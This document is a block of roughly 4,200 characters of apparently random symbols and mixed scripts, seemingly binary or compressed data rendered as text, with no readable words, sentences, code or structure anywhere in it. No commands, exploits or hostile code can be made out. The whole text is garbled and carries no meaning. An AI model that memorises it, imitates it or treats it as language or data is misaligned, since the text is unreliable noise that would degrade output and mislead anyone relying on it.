e~+[YjWH?N>X<5ǩѼM8cܪX}^r?IrS"Zm:"57u&|" >[XHeS$Ryଠ:2|Df? ZPDC(x0|R;Ms Vi,͹:xi`,GAlVFY:=29n~@yW~eN ]_Go'}э_ЯR66!: gFM~q; eX<#%A0R } G&x&?ZƱkeR Knz`9j%@qR[-$u&9zOJKad"[jײc;&B(g<9nȯGxP.fF}P 31 R}<3a~ 2xV Dr \:}#S}HI\OKuI (GW 񳹸2:9%_3N|0}y lMZT [/9 n3 Mòdd^.}:BNp>czí Y%-*9ܭhRcd,. V`e n/=9xGQKx|b`D@2R 8'} }+D&"R}r22 Ƿs]x9%<({e:Hqǽ`}Ka9ı< ~ O#%iKKlF)'I+(`Sd` "c^ i\hBaq}:W|F BReax-sʬ:W<%$ %CD%Iʤ&Ra0}nxoW0ey'Ża2r# ۰A^9Q=5.(M$~V=SFNW H~kR9+~;khIm9aJ_Z"6 a>a<%2nbQ`\tU 9k15uCL$ݹp P1=Os^uEJx5zy:j:k OcnW;boz{~Vơaa5ksJ@?1{$=ks^nR)XN1OJxFh R"}?xSac*FSi;7~׫3 pw0<%~ P+^ Ye}CR/>>"m~&&>M[h [}"d&RO@3^(ʽ*QZy 1V}?O4Rh6R a3߷ =mR/90CI:c}s۾"xЬˢW$"{PG xZ1R0xE9+ ^rE`70l@.' }zN3U<3*? "c=p '1"kJ H'x+ oN9 d~c+jJz7(W]""?n괺6wN"Z`~:|??-E&®V$~X/& xL7pz^tY78Ue# #r=sU/EjRC4mxNݴ9 u:V ZIcr1xpzsfV9`qLI?\~ChOOmtעxZ}?S#b-X7 g~zzb3Sm*qvsM=w}&ڪ^׵(! ֵen QYSLSNk!/n00vRwSa9-V`[$`(9cq_@Bq`捭0;79?w<|k1 һlnrPNa&} ~-_O'0`!R%]%b1' X՝OR9+*"0O `uaӫ9ԥSy.ox x&(STݽ]Nr3~["veIGlq=M|gsxI6 ]ZΪ,zR}~#`F"iqcD>S G}1^+ i;Vi-Z]ܮ` b٥_/y(@qg W0.: 6 r>QR0+zb+I0TbN"$~)69{0V27SWWccXyKZc'iQLaW`xS\`źʸ&|V|!G[[ 3OrPY=15T~я 64/?Z~k}o፾}3]8濴n}a_6pS)2?WڥiWd}q{*1rXRd&m0cd"J# ,df8Nh;=7pn 6J~O2^S J:6ܷ0!wbO P=:-&} ` 9 r9ϧz> X75XkrѢL 7w}xNHR:2 +uN/'~h!nReQ6Q Ew|Yq1uyz8 `;6i<'[íZhu g>r`x}b2k꣧o~:hTW4|ki"xQ6Ln0 {e#27@^.1NSy e Q=̩B8<Scc> .Fr:~G=k,^!F~ ,}% "rGSYd?aY49PyU !~xm|/NܼPcT,/=Fk|u&{m]۾P>X޽i 0'6߼( !z^:S|,_&a]uѵ4jb~xƩ:,[ = R Y?}ڼ?x,1دv&@q Sz8Xz~"j=} ~h@'hF#p?xQ-lvpxcx&lxG·0L%y?-y`l7>q2A?"F}c!jB:J +Qv=Vu[Qml%R7aIT}x ? a7 1 -Ll}0O=up"3ҶW/!|w}w^qa M8Q?0IEhaX"`a ?!Q!R~q}~O`I0 Jy|!@99>8+u&! ʰ<6Iz S)Z_POw*nm=>Jh]&@nTR6IT ^Fx73!ַa$ 5Io:ȪmY[80*x"k+\ Ho}l"k, c{Z\ Q pz}3} JXOh٥LdR`6G^^[bYRʻd}4  2,; CQĴcmV{W\xx,MRl-n~ ?#}"SҥWN;~)"S9cLj뵿ūikiX7yny} t`V's$9:{wEk c$.~k}AprѢ!`lSs90IÝw&ef"pR9g}Tl} NkUK0Up ^ȥ{Hp`bqϩ^: }' Mz+5x('C$_I?^'z~+-}*?.x^1}My¸&L7&' bqG]˪1$oR8`.q}s־C98cvSfuַ _ۺxר:גxP-/mnQG`Rq=>nr!h`+;3<۩axx*Vtiwi |cRϮ3ֽ̰0 QroZѫO൯w8;k: x ;Ja;9R+g}|I{o2ʲ9 029L\0xb "Bv$&#i>=f N >NXW~5\0^(w2}X$ e888^n^ 9Q~7 DCѵs9W6!2\:?(#'$GJW\ 0E"g;Pv Nsx"}/:t+]JM*"^Ud|0M923"6H^&1oE.7*Htp{g<+cpby=8_skB\j""[9Pb9B& =93LaaXdP.0\0?"J" "S+=@9<AQ׻աxk",J$S}xZWH"UQ ]Xg< ߨg3-qe0*R$ܒ S8}_/e'+-Ӷ[sk%x0-peCr ϒ~=a(QWd\. \F0M>grq+SNHO  ܥݭnJ|P6Kc=Is} Ga)a=#vK:oKٍ&R[sټˏ" pwqSR 9!KS&vD A9 Rq} $SnIV[]}A |k|E Mu R.Idk}yvc iUSZ&zn*j-ɭ/SH\y5 ۠"0 xnz#ԯ, eŴ'c&<ݬ<S`kâna8=ʪ[x"pN02zK8.(v2@ ~xfuyUWa|:%Q^[|o5ZY"^{96Yv*x>_|UִtM9P## z/0-įdd,:p03S{9=+ ![!#="յjHh:[{?.u_%ccA }0x9>~9,ah2 Ary$VN ]=$} #1dMax!^!Kk FN8+{Ҽo[MRoe[_m/k.kg}xsSӴ`zKo0cPC9Y0#^9x˷`09;=aAkNBlcF 2Ҭ]K$ܮ"/H$ fO贵jN̿ xNFdhT9}A>qStһ\ȶc3@#I W.<ѬaA ; q2q $# ! !}9=;Ru+ϥe+$娯'+ZH4qFV9gR208)б>M|¾"i9Jd"O;sr+)DRaF*3d {zwQU~f ~>I+Rq`3Sf]STn4_*5azGC,+1òOcSb2y;cգh:`rNBk gxaX/hx*Tn = 2|(e$ x!'y+S=Y:i -BK":ơ&v-Y=Onjyf4T P`S7={m/ ZK&GbG AS*ÿ IoINU8Rw; 1Y "E Oyto/8~#ñl2f'h?CYd:qӷeĩ RL+~A3g=aRt3 QREw_;haSir ^i!|ROmJ/$lӿ [` >cF61 z7Ldxw9AXO"hm"NT I$pG~:bWS|n>Ϣܢ"%qL^ KpNA< &==ffF!yc $=ϭY]eDH>x_TP"a0ch['7a!?wn5u|c{O1"xsZ&y32  ~AcO45-fR. s~"Ҿ"wo\lxP Xc S5q/>#~Wif$\3 }<9H" ( : 8=+ꨬUAT]{msF0\}&BO}+:x1 ,v ~IZ0ǧ"3 20p9~)Zoq/L Rm}9[#\Bs [; g2SV/[u /a} =xHx." Qxh#a$'u<`:>2>+LSiwF1!eg`S }Vv $|,szΒxD\Rm o| :{Ӷn!0l, ( RR crsa,49MOH!@ }`9w;At0&.클5,u-cKӣ̺U.L0&%2"~x [`cnH}y"keRF{(ة `J#}wg<:;M ^\yhX!vBzrF?B/s<B)۱ w5:se{mѤh]Wm4W4bC3r$ pw`dzt!y`IhM)!edRm'>?wzKcRq6fp$)wUl`ARAgr:Rg[iYs5GK=FMG ``KɦuOQ!R/G`@qzd/(K%}bM x>RRVIY~#"@8 Sgq54v[(q c!FGa? UWZ$y}zק?>"6{""}.$`US& ' r$1(y7 V<~:  Mw'bxb7g~,iF8½k/{!2S/?:$eSRIRg9czrrNObi Ѻ/$,;R vxb" nmxn}3G,.٣u r`[<!@:c9Zh M5-q}G9 ;A-~v^ONxE}PO&e[]Gp /˷81~@B*8@p"8Q~H'8I-% F6U|ڸ ^w`K1K,}ddl0PkG&Uw};y[Zs"["6 Vq,# 8ryA::,c66˴'?t}H--":|Ƭ[  7#99$,+qS\ cy^ݸa"B-9%׮9Vw~vTꢷ%" [x"2gS?6 9#a@bTC*3BA9 =U"2l0iIc2@%94'HԾ@ Tpax::5eMw:_+a3yv " 1Gȫ#  p JvaDE: NFr2qxAau"#Ħ822/[Tr;q`z*(0 ;T:; Skޭ8U{^IZwkXZo_oȡ R2S SVa DRsx|2 [9zs{wnmCO+ GO8e`^G5f{X~,k0< y"vo I=S19)R#;Anc}:t#TkB.0R-Zgum}fJ+#2P~i%S3P*YA}2r:iRUQq0H9!={~ J}Vײm.ߺiYlkgLrT" &wH6`34e &L"%clyîA0 ~$[3u"pNO=  c{rYK ~F "a"Lr1ӯ2<"C".fջ~-g4{[r}xlqpwǻ8rF \c}-gycirw#o95afxfGusJ S/LtT7w,l ɳ;e෨RsgTS^ '~9:+kZd*[ܫ%Rk0}X$k#Ȩ P2bvx"b)m$*8LE8'N y+{uI'wva4fr=u sFlV$ Hс$ =}] :}+"mRlT#nki _T7θd\8=y}R{x]Z#r#H6 Fkr;s.&;s 9HSaխtU-n | vqS{gRtS.P9}0_[;mޭZRX{+"-7!G"9~nrYXp S!ӭoP̏t (0޹s#GLanJ!T#?p}xIn#y'q@r[J&qP}:7^0yWa_79oa #q0{mSyR{v޶eХ̮jR ":b+J y"]d OL9-Rc'SڲejP  qdВjPpa` <iWNsmvz5:Rs\u